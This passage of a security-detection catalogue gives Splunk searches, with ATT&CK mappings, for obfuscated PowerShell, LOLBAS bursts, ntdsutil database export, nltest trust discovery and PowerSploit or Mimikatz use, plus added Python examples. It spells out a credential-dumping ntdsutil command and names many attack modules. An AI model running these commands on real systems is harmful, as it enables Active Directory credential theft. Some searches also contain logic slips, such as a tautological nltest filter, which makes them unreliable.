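    {"dest": "wks02", "user": "bob", "process_name": "powershell.exe",
     "process": "powershell.exe -c \"$x='a'+'b';$y='c'+'d';$z='e'+'f';"
                "$w='g'+'h';$v='i'+'j';$u='k'+'l'\""},
    # carets in cmd.exe, not powershell.exe: excluded by the process_name filter
    {"dest": "wks03", "user": "carol", "process_name": "cmd.exe",
     "process": "cmd.exe /c e^c^h^o ^h^i"},
    # exactly 10 (3 backticks, 6 quotes, 1 caret): not strictly greater, so kept out
    {"dest": "wks04", "user": "dave", "process_name": "powershell.exe",
     "process": "powershell.exe -c \"Wr`it`e-Ho`st 'a' 'b' 'c' ^\""},
]


def obfuscation_score(cmd_line):
    """Equivalent of the SPL eval num_obfuscation for one command line."""
    return sum(cmd_line.count(ch) for ch in OBFUSCATION_CHARS)


def flag_obfuscated_powershell(events, threshold=THRESHOLD):
    """Apply the search's process_name filter and threshold; returns the rows
    that would reach the notable, each carrying its num_obfuscation score."""
    hits = []
    for row in events:
        if row.get("process_name", "").lower() != "powershell.exe":
            continue
        score = obfuscation_score(row.get("process", ""))
        if score > threshold:
            hits.append({**row, "num_obfuscation": score})
    return hits


if __name__ == "__main__":
    for hit in flag_obfuscated_powershell(SAMPLE_EVENTS):
        print(hit["dest"], hit["user"], hit["num_obfuscation"])
```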

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1059.001 PowerShell Execution


Kill Chain Phase

  • Command and Control
  • Actions on Objectives


Known False Positives

These characters might be legitimately on the command-line, but it is not common.

Reference

Test Dataset


version: 4


Monitor registry keys for print monitors

This search looks for registry activity associated with modifications to the registry key `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors`. In this scenario, an attacker can load an arbitrary .dll into the print-monitor registry by giving the full path name of the after.dll. The system will execute the .dll with elevated (SYSTEM) permissions, and it will persist after reboot.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1547.010
  • Last Updated: 2020-11-23

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.action=modified AND Registry.registry_path="*CurrentControlSet\\Control\\Print\\Monitors*" by Registry.dest, Registry.registry_key_name Registry.user Registry.registry_path Registry.registry_value_name Registry.action | `drop_dm_object_name(Registry)` | `monitor_registry_keys_for_print_monitors_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records registry activity from your hosts to populate the Endpoint data model in the Registry node. This is typically populated via an endpoint detection-and-response product, such as Carbon Black, or via other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report registry modifications.

Required field

ATT&CK

ID Technique Tactic
T1547.010 Port Monitors Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

You will encounter noise from legitimate print-monitor registry entries.

Reference

Test Dataset


version: 2


More than usual number of lolbas applications in short time period

Attacker activity may comprise executing several LOLBAS applications in conjunction to accomplish its objectives. This search looks for a higher than usual number of LOLBAS applications over a window of time, by building profiles per machine.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1059, T1053
  • Last Updated: 2020-08-25

Search

| from read_ssa_enriched_events() | eval device=ucast(map_get(input_event, "dest_device_id"), "string", null), process_name=lower(ucast(map_get(input_event, "process_name"), "string", null)), timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)) | where process_name=="regsvcs.exe" OR process_name=="ftp.exe" OR process_name=="dfsvc.exe" OR process_name=="rasautou.exe" OR process_name=="schtasks.exe" OR process_name=="xwizard.exe" OR process_name=="findstr.exe" OR process_name=="esentutl.exe" OR process_name=="cscript.exe" OR process_name=="reg.exe" OR process_name=="csc.exe" OR process_name=="atbroker.exe" OR process_name=="print.exe" OR process_name=="pcwrun.exe" OR process_name=="vbc.exe" OR process_name=="rpcping.exe" OR process_name=="wsreset.exe" OR process_name=="ilasm.exe" OR process_name=="certutil.exe" OR process_name=="replace.exe" OR process_name=="mshta.exe" OR process_name=="bitsadmin.exe" OR process_name=="wscript.exe" OR process_name=="ieexec.exe" OR process_name=="cmd.exe" OR process_name=="microsoft.workflow.compiler.exe" OR process_name=="runscripthelper.exe" OR process_name=="makecab.exe" OR process_name=="forfiles.exe" OR process_name=="desktopimgdownldr.exe" OR process_name=="control.exe" OR process_name=="msbuild.exe" OR process_name=="register-cimprovider.exe" OR process_name=="tttracer.exe" OR process_name=="ie4uinit.exe" OR process_name=="sc.exe" OR process_name=="bash.exe" OR process_name=="hh.exe" OR process_name=="cmstp.exe" OR process_name=="mmc.exe" OR process_name=="jsc.exe" OR process_name=="scriptrunner.exe" OR process_name=="odbcconf.exe" OR process_name=="extexport.exe" OR process_name=="msdt.exe" OR process_name=="diskshadow.exe" OR process_name=="extrac32.exe" OR process_name=="eventvwr.exe" OR process_name=="mavinject.exe" OR process_name=="regasm.exe" OR process_name=="gpscript.exe" OR process_name=="rundll32.exe" OR process_name=="regsvr32.exe" OR process_name=="regedit.exe" OR process_name=="msiexec.exe" 
OR process_name=="gfxdownloadwrapper.exe" OR process_name=="presentationhost.exe" OR process_name=="regini.exe" OR process_name=="wmic.exe" OR process_name=="runonce.exe" OR process_name=="syncappvpublishingserver.exe" OR process_name=="verclsid.exe" OR process_name=="psr.exe" OR process_name=="infdefaultinstall.exe" OR process_name=="explorer.exe" OR process_name=="expand.exe" OR process_name=="installutil.exe" OR process_name=="netsh.exe" OR process_name=="wab.exe" OR process_name=="dnscmd.exe" OR process_name=="at.exe" OR process_name=="pcalua.exe" OR process_name=="cmdkey.exe" OR process_name=="msconfig.exe" | stats count(process_name) as lolbas_counter by device,span(timestamp, 300s) | eval lolbas_counter=lolbas_counter*1.0 | rename window_end as timestamp | adaptive_threshold algorithm="quantile" value="lolbas_counter" entity="device" window=2419200000L | where label AND quantile>0.99 | eval start_time = window_start, end_time = timestamp, entities = mvappend(device), body = "TBD" | into write_ssa_detected_events();
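A plain-Python approximation of this search's windowing and per-device baselining, added here as an example; it is not Splunk's own code. It assumes a nearest-rank quantile in place of the SSA `adaptive_threshold` command, a minimum-history guard (`MIN_HISTORY`) that the search itself does not have, and only a subset of the LOLBAS list; the events are constructed.

```python
"""Added example (not Splunk's code): a plain-Python approximation of the
"More than usual number of lolbas applications in short time period" search.
It buckets LOLBAS process starts per device into 300 s spans and flags a span
whose count exceeds the 0.99 quantile of that device's own recent history."""
import math
from collections import defaultdict

# Subset of the LOLBAS binaries named in the search (lower-cased, as the SPL does).
LOLBAS = {
    "certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe", "bitsadmin.exe",
    "wscript.exe", "cscript.exe", "schtasks.exe", "cmd.exe", "msiexec.exe",
    "wmic.exe", "netsh.exe", "reg.exe", "sc.exe", "forfiles.exe",
}
SPAN = 300                         # span(timestamp, 300s)
BASELINE_SECONDS = 28 * 24 * 3600  # window=2419200000L milliseconds = 28 days
QUANTILE = 0.99                    # where quantile>0.99
MIN_HISTORY = 20                   # assumption of this example: spans needed before alerting


def window_counts(events):
    """Count LOLBAS starts per (device, span start). Spans with no LOLBAS
    activity produce no row, exactly as the SPL stats step would."""
    counts = defaultdict(int)
    for ts, device, process_name in events:
        if process_name.lower() in LOLBAS:
            counts[(device, ts - ts % SPAN)] += 1
    return dict(counts)


def nearest_rank_quantile(values, q):
    """Nearest-rank quantile; stands in for the adaptive_threshold estimate."""
    ordered = sorted(values)
    idx = max(0, min(len(ordered) - 1, math.ceil(q * len(ordered)) - 1))
    return ordered[idx]


def detect_lolbas_bursts(events):
    """Return one alert per (device, span) whose lolbas_counter exceeds the
    device's 0.99 quantile over the preceding 28 days of spans."""
    per_device = defaultdict(list)
    for (device, start), counter in window_counts(events).items():
        per_device[device].append((start, counter))
    alerts = []
    for device, spans in per_device.items():
        spans.sort()
        for i, (start, counter) in enumerate(spans):
            history = [c for s, c in spans[:i] if s >= start - BASELINE_SECONDS]
            if len(history) < MIN_HISTORY:  # baseline not built yet: stay quiet
                continue
            threshold = nearest_rank_quantile(history, QUANTILE)
            if counter > threshold:
                alerts.append({"entity": device, "start_time": start,
                               "end_time": start + SPAN,
                               "lolbas_counter": counter, "threshold": threshold})
    return alerts


def build_sample_events():
    """Constructed events (epoch seconds, device, process_name), not real data:
    wks01 has a steady baseline of 1-3 LOLBAS starts every 30 minutes and then
    a burst of 15 in one span; wks02 has too little history to alert on."""
    base = 1_600_000_000
    names = sorted(LOLBAS)
    events = []
    for i in range(200):
        ts = base + i * 1800
        for k in range(1 + i % 3):
            events.append((ts + k, "wks01", names[(i + k) % len(names)]))
        events.append((ts + 10, "wks01", "notepad.exe"))  # ignored: not LOLBAS
    burst = base + 200 * 1800
    for k in range(15):
        events.append((burst + k, "wks01", names[k]))
    for i in range(5):
        events.append((base + i * 1800, "wks02", "cmd.exe"))
    for k in range(12):
        events.append((burst + k, "wks02", names[k]))
    return events


if __name__ == "__main__":
    for alert in detect_lolbas_bursts(build_sample_events()):
        print(alert)
```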

Associated Analytic Story

How To Implement

Collect endpoint process data, such as Sysmon or Windows event ID 4688 events.

Required field

  • dest_device_id
  • _time
  • process_name


ATT&CK

ID Technique Tactic
T1059 Command and Scripting Interpreter Execution
T1053 Scheduled Task/Job Execution, Persistence, Privilege Escalation


Kill Chain Phase

  • Exploitation


Known False Positives

Some administrative tasks may involve multiple uses of LOLBAS applications in a short period of time. This might also trigger false positives at the beginning, before enough data has been collected to construct the baseline.


Reference


Test Dataset

version: 1


Nltest domain trust discovery

This search looks for the execution of `nltest.exe` with command-line arguments utilized to query for domain trust information. Two arguments are of interest: `/domain_trusts` returns a list of trusted domains, and `/all_trusts` returns all trusted domains. Red Teams and adversaries alike use NLTest.exe to enumerate the current domain to assist with further understanding where to pivot next.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1482
  • Last Updated: 2021-01-25

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=nltest.exe OR Processes.process_name!=nltest.exe) (Processes.process=*/domain_trusts* OR Processes.process=*/all_trusts*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `nltest_domain_trust_discovery_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be ingesting process information that includes the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1482 Domain Trust Discovery Discovery


Kill Chain Phase

  • Exploitation


Known False Positives

Administrators may use nltest for troubleshooting purposes; otherwise, it is rarely used.

Reference


Test Dataset


version: 1


Ntdsutil export ntds

Monitor for signs that Ntdsutil is being used to extract the Active Directory database (NTDS.dit), typically for offline password cracking. It may be used in normal circumstances with no command-line arguments or with shorthand variations of the more common arguments. Ntdsutil.exe is typically seen run on a Windows Server. The typical command used to dump ntds.dit is `ntdsutil "ac i ntds" "ifm" "create full C:\Temp" q q`. This technique uses "Install from Media" (IFM), which extracts a copy of the Active Directory database. A successful export of the Active Directory database will yield a file modification named ntds.dit at the destination.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1003.003
  • Last Updated: 2021-01-28

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=ntdsutil.exe Processes.process=*ntds* Processes.process=*create*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ntdsutil_export_ntds_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships from your endpoints, to populate the Endpoint data model in the Processes node. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1003.003 NTDS Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

It is highly possible that server administrators will troubleshoot with ntdsutil.exe, generating false positives.

Reference


Test Dataset


version: 1


Overwriting accessibility binaries

Microsoft Windows contains accessibility features that can be launched with a key combination before a user has logged in. An adversary can modify or replace these programs so they can get a command prompt or backdoor without logging in to the system. This search looks for modifications to these binaries.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1546.008
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.user) as user values(Filesystem.dest) as dest values(Filesystem.file_path) as file_path from datamodel=Endpoint.Filesystem where (Filesystem.file_path=*\\Windows\\System32\\sethc.exe* OR Filesystem.file_path=*\\Windows\\System32\\utilman.exe* OR Filesystem.file_path=*\\Windows\\System32\\osk.exe* OR Filesystem.file_path=*\\Windows\\System32\\Magnify.exe* OR Filesystem.file_path=*\\Windows\\System32\\Narrator.exe* OR Filesystem.file_path=*\\Windows\\System32\\DisplaySwitch.exe* OR Filesystem.file_path=*\\Windows\\System32\\AtBroker.exe*) by Filesystem.file_name Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `overwriting_accessibility_binaries_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records the filesystem activity from your hosts to populate the Endpoint file-system data model node. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data.

Required field

ATT&CK

ID Technique Tactic
T1546.008 Accessibility Features Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Microsoft may provide updates to these binaries. Verify that these changes do not correspond with your normal software update cycle.

Reference

Test Dataset


version: 4


Probing access with stolen credentials via powersploit modules

This detection identifies use of PowerSploit modules that facilitate access probing with admin credentials as well as probing access to system services.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1078, T1098
  • Last Updated: 2020-11-04

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Test-AdminAccess/)=true OR match_regex(cmd_line, /(?i)Invoke-CheckLocalAdminAccess/)=true OR match_regex(cmd_line, /(?i)Test-ServiceDaclPermission/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from the devices of interest, including event ID 4688 with command-line logging enabled.

Required field

  • _time
  • process
  • dest_user_id
  • dest_device_id


ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation
T1098 Account Manipulation Persistence


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Process creating lnk file in suspicious location

This search looks for a process launching an `*.lnk` file under `C:\User*` or `*\Local\Temp\*`. This is common behavior used by various spear phishing tools.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1566.002
  • Last Updated: 2021-01-28

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_name="*.lnk" AND Filesystem.file_path="C:\\Temp*" by _time span=1h Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.file_hash Filesystem.user | `drop_dm_object_name(Filesystem)` | rename process_id as lnk_pid | join lnk_pid, _time [ | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=* by _time span=1h Processes.parent_process_id Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process | `drop_dm_object_name(Processes)` | rename parent_process_id as lnk_pid | fields _time lnk_pid process_id dest process_name process_path process] | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table firstTime, lastTime, lnk_pid, process_id, user, dest, file_name, file_path, process_name, process, process_path, file_hash | `process_creating_lnk_file_in_suspicious_location_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records filesystem and process activity from your hosts to populate the Endpoint data model. This is typically populated via an endpoint detection-and-response product, such as Carbon Black, or endpoint data sources, such as Sysmon.

Required field

ATT&CK

ID Technique Tactic
T1566.002 Spearphishing Link Initial Access


Kill Chain Phase

  • Installation
  • Actions on Objectives


Known False Positives

This detection should yield little or no false positive results. It is uncommon for LNK files to be executed from temporary or user directories.

Reference


Test Dataset


version: 4


Process execution via wmi

This search looks for processes launched via WMI.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1047
  • Last Updated: 2020-03-16

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where Processes.parent_process_name = *WmiPrvSE.exe by Processes.user Processes.dest Processes.process_name | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `process_execution_via_wmi_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships, from your endpoints to populate the Endpoint data model in the Processes node. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1047 Windows Management Instrumentation Execution


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, administrators may use WMI to execute commands for legitimate purposes.

Reference

Test Dataset


version: 3


Processes tapping keyboard events

This search looks for processes on a macOS system that are tapping keyboard events, essentially monitoring all keystrokes made by a user. This is a common technique used by RATs to log keystrokes from a victim, although it can also be used by legitimate processes like Siri to react to human input.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2019-01-25

Search

| from datamodel Alerts.Alerts | search app=osquery:results name=pack_osx-attacks_Keyboard_Event_Taps | rename columns.cmdline as cmd, columns.name as process_name, columns.pid as process_id | dedup host,process_name | table host,process_name, cmd, process_id | `processes_tapping_keyboard_events_filter`

Associated Analytic Story


How To Implement

In order to properly run this search, Splunk needs to ingest data from your osquery deployed agents with the [osx-attacks.conf](https://github.com/facebook/osquery/blob/experimental/packs/osx-attacks.conf#L599) pack enabled. Also the [TA-OSquery](https://github.com/d1vious/TA-osquery) must be deployed across your indexers and universal forwarders in order to have the osquery data populate the Alerts data model.

Required field

Kill Chain Phase

  • Command and Control


Known False Positives

There might be some false positives, as keyboard event taps are used by processes like Siri and Zoom video chat; for some good examples of processes to exclude, please see [this](https://github.com/facebook/osquery/pull/5345#issuecomment-454639161) comment.

Reference

Test Dataset

version: 1


Processes launching netsh

This search looks for processes launching netsh.exe. Netsh is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a computer that is currently running. Netsh can be used as a persistence proxy technique to execute a helper DLL when netsh.exe is executed. In this search, we are looking for processes spawned by netsh.exe and executing commands via the command line.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1562.004
  • Last Updated: 2020-07-10

Search

| tstats `security_content_summariesonly` count values(Processes.process) AS Processes.process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process=*netsh* by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.user Processes.dest |`drop_dm_object_name("Processes")` |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` |`processes_launching_netsh_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records process activity from your hosts to populate the Endpoint data model.

Required field

ATT&CK

ID | Technique | Tactic
T1562.004 | Disable or Modify System Firewall | Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Some VPN applications are known to launch netsh.exe. Outside of these instances, it is unusual for an executable to launch netsh.exe and run commands.

Reference

Test Dataset


version: 3


Rare parent-child process relationship

An attacker may use LOLBAS tools spawned from vulnerable applications that are not typically used by system administrators. This search leverages the Splunk Streaming ML DSP plugin to find rare parent/child process relationships. The list of applications was extracted from https://github.com/LOLBAS-Project/LOLBAS/tree/master/yml/OSBinaries

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1203, T1059, T1053, T1072
  • Last Updated: 2020-08-13

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)) | eval parent_process=lower(ucast(map_get(input_event, "parent_process_name"), "string", null)), parent_process_name=mvindex(split(parent_process, "\\"), -1), process_name=lower(ucast(map_get(input_event, "process_name"), "string", null)), dest_user_id=ucast(map_get(input_event, "dest_user_id"), "string", null), dest_device_id=ucast(map_get(input_event, "dest_device_id"), "string", null) | where parent_process_name!=null | select parent_process_name, process_name, timestamp, dest_device_id, dest_user_id | conditional_anomaly conditional="parent_process_name" target="process_name" | rename output as input | where input < 1 | adaptive_threshold algorithm="quantile" entity="parent_process_name" window=604800000L | where label AND quantile<0.1 AND (process_name="powershell.exe" OR process_name="regsvcs.exe" OR process_name="ftp.exe" OR process_name="dfsvc.exe" OR process_name="rasautou.exe" OR process_name="schtasks.exe" OR process_name="xwizard.exe" OR process_name="findstr.exe" OR process_name="esentutl.exe" OR process_name="cscript.exe" OR process_name="reg.exe" OR process_name="csc.exe" OR process_name="atbroker.exe" OR process_name="print.exe" OR process_name="pcwrun.exe" OR process_name="vbc.exe" OR process_name="rpcping.exe" OR process_name="wsreset.exe" OR process_name="ilasm.exe" OR process_name="certutil.exe" OR process_name="replace.exe" OR process_name="mshta.exe" OR process_name="bitsadmin.exe" OR process_name="wscript.exe" OR process_name="ieexec.exe" OR process_name="cmd.exe" OR process_name="microsoft.workflow.compiler.exe" OR process_name="runscripthelper.exe" OR process_name="makecab.exe" OR process_name="forfiles.exe" OR process_name="desktopimgdownldr.exe" OR process_name="control.exe" OR process_name="msbuild.exe" OR process_name="register-cimprovider.exe" OR process_name="tttracer.exe" OR process_name="ie4uinit.exe" OR process_name="sc.exe" OR process_name="bash.exe" OR process_name="hh.exe" OR process_name="cmstp.exe" OR process_name="mmc.exe" OR process_name="jsc.exe" OR process_name="scriptrunner.exe" OR process_name="odbcconf.exe" OR process_name="extexport.exe" OR process_name="msdt.exe" OR process_name="diskshadow.exe" OR process_name="extrac32.exe" OR process_name="eventvwr.exe" OR process_name="mavinject.exe" OR process_name="regasm.exe" OR process_name="gpscript.exe" OR process_name="rundll32.exe" OR process_name="regsvr32.exe" OR process_name="regedit.exe" OR process_name="msiexec.exe" OR process_name="gfxdownloadwrapper.exe" OR process_name="presentationhost.exe" OR process_name="regini.exe" OR process_name="wmic.exe" OR process_name="runonce.exe" OR process_name="syncappvpublishingserver.exe" OR process_name="verclsid.exe" OR process_name="psr.exe" OR process_name="infdefaultinstall.exe" OR process_name="explorer.exe" OR process_name="expand.exe" OR process_name="installutil.exe" OR process_name="netsh.exe" OR process_name="wab.exe" OR process_name="dnscmd.exe" OR process_name="at.exe" OR process_name="pcalua.exe" OR process_name="cmdkey.exe" OR process_name="msconfig.exe") | eval start_time = timestamp, end_time = timestamp, entities = mvappend(dest_device_id, dest_user_id), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

Collect endpoint process data, such as Sysmon events or Windows Security event ID 4688.

Required field

  • process_name
  • parent_process_name
  • _time
  • dest_device_id
  • dest_user_id


ATT&CK

ID | Technique | Tactic
T1203 | Exploitation for Client Execution | Execution
T1059 | Command and Scripting Interpreter | Execution
T1053 | Scheduled Task/Job | Execution, Persistence, Privilege Escalation
T1072 | Software Deployment Tools | Execution, Lateral Movement


Kill Chain Phase

  • Exploitation


Known False Positives

Some custom tools used by administrators may, on rare occasions, launch applications remotely. This might trigger false positives at the beginning, before enough data has been collected to construct the baseline.


Reference

Test Dataset

version: 1


Reconnaissance and access to accounts groups and policies via powersploit modules

This detection identifies access to PowerSploit modules that discover accounts, groups and policies that can be accessed or taken over.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1078, T1087, T1484
  • Last Updated: 2020-11-05

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Find-DomainLocalGroupMember/)=true OR match_regex(cmd_line, /(?i)Invoke-EnumerateLocalAdmin/)=true OR match_regex(cmd_line, /(?i)Find-DomainUserEvent/)=true OR match_regex(cmd_line, /(?i)Invoke-EventHunter/)=true OR match_regex(cmd_line, /(?i)Find-DomainUserLocation/)=true OR match_regex(cmd_line, /(?i)Invoke-UserHunter/)=true OR match_regex(cmd_line, /(?i)Get-DomainForeignGroupMember/)=true OR match_regex(cmd_line, /(?i)Find-ForeignGroup/)=true OR match_regex(cmd_line, /(?i)Get-DomainForeignUser/)=true OR match_regex(cmd_line, /(?i)Find-ForeignUser/)=true OR match_regex(cmd_line, /(?i)Get-DomainGPO/)=true OR match_regex(cmd_line, /(?i)Get-NetGPO/)=true OR match_regex(cmd_line, /(?i)Get-DomainGPOComputerLocalGroupMapping/)=true OR match_regex(cmd_line, /(?i)Find-GPOComputerAdmin/)=true OR match_regex(cmd_line, /(?i)Get-DomainGPOLocalGroup/)=true OR match_regex(cmd_line, /(?i)Get-NetGPOGroup/)=true OR match_regex(cmd_line, /(?i)Get-DomainGPOUserLocalGroupMapping/)=true OR match_regex(cmd_line, /(?i)Find-GPOLocation/)=true OR match_regex(cmd_line, /(?i)Get-DomainGroup/)=true OR match_regex(cmd_line, /(?i)Get-NetGroup/)=true OR match_regex(cmd_line, /(?i)Get-DomainGroupMember/)=true OR match_regex(cmd_line, /(?i)Get-NetGroupMember/)=true OR match_regex(cmd_line, /(?i)Get-DomainManagedSecurityGroup/)=true OR match_regex(cmd_line, /(?i)Find-ManagedSecurityGroups/)=true OR match_regex(cmd_line, /(?i)Get-DomainOU/)=true OR match_regex(cmd_line, /(?i)Get-NetOU/)=true OR match_regex(cmd_line, /(?i)Get-DomainUser/)=true OR match_regex(cmd_line, /(?i)Get-NetUser/)=true OR match_regex(cmd_line, /(?i)Get-DomainUserEvent/)=true OR match_regex(cmd_line, /(?i)Get-UserEvent/)=true OR match_regex(cmd_line, /(?i)Get-NetLocalGroup/)=true OR match_regex(cmd_line, /(?i)Get-NetLocalGroupMember/)=true OR match_regex(cmd_line, /(?i)Get-NetLoggedon/)=true OR match_regex(cmd_line, /(?i)Get-RegLoggedOn/)=true OR match_regex(cmd_line, /(?i)Get-WMIRegLastLoggedOn/)=true OR match_regex(cmd_line, /(?i)Get-LastLoggedOn/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including event ID 4688 with command line logging enabled.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID | Technique | Tactic
T1078 | Valid Accounts | Defense Evasion, Initial Access, Persistence, Privilege Escalation
T1087 | Account Discovery | Discovery
T1484 | Domain Policy Modification | Defense Evasion, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance and access to accounts and groups via mimikatz modules

This detection identifies use of Mimikatz modules for discovery of accounts and groups and access to them.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1078, T1087, T1484
  • Last Updated: 2020-11-05

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)net::user/)=true OR match_regex(cmd_line, /(?i)net::group/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including event ID 4688 with command line logging enabled.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID | Technique | Tactic
T1078 | Valid Accounts | Defense Evasion, Initial Access, Persistence, Privilege Escalation
T1087 | Account Discovery | Discovery
T1484 | Domain Policy Modification | Defense Evasion, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance and access to Active Directory infrastructure via powersploit modules

This detection identifies access to PowerSploit modules for reconnaissance and access to elements of Active Directory infrastructure, such as domain identifiers, AD sites and forests, and trust relations.

Search

